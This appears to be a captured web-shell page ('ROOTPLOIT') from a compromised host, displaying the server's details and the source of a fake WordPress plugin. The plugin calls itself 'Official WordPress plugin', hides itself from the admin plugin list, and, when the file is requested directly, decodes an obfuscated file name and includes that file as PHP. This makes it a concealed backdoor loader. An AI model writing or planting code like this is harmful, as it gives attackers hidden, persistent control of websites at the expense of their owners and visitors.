ROOTPLOIT
Server: LiteSpeed
System: Linux server71.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: niphet (1079)
PHP: 5.3.29
Disabled: NONE
Upload Files
File: /home/niphet/public_html/wp-content/plugins/wp-programme-instance/index.php
<?php
/*
Plugin Name: WP Programme Instance
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 11.9.3
Author URI: http://wordpress.org/#
License: GPL2
*/

function eat_yas()
{
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $h = array('wp-programme-instance/index.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $h)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function cgm_orf($plugins)
{
    $p = 'wp-programme-instance/index.php';
    if (array_key_exists($p, $plugins)) {
        unset($plugins[$p]);
    }
    return $plugins;
}

function oui($f, $d)
{
    $r = '';
    for ($i = 0; $i < strlen($f); $i += 2) {
        $v = ord($f[$i]) - 65;
        $b = ord($f[$i + 1]);
        if ($b > 90) $b -= 6;
        $s = $v * 52 + ($b - 65);
        $r .= chr($s - $d);
    }
    return $r;
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'eat_yas');
    add_filter('all_plugins', 'cgm_orf');
} else {
    include oui('DZDoDoCaDbDrDr', 84);
}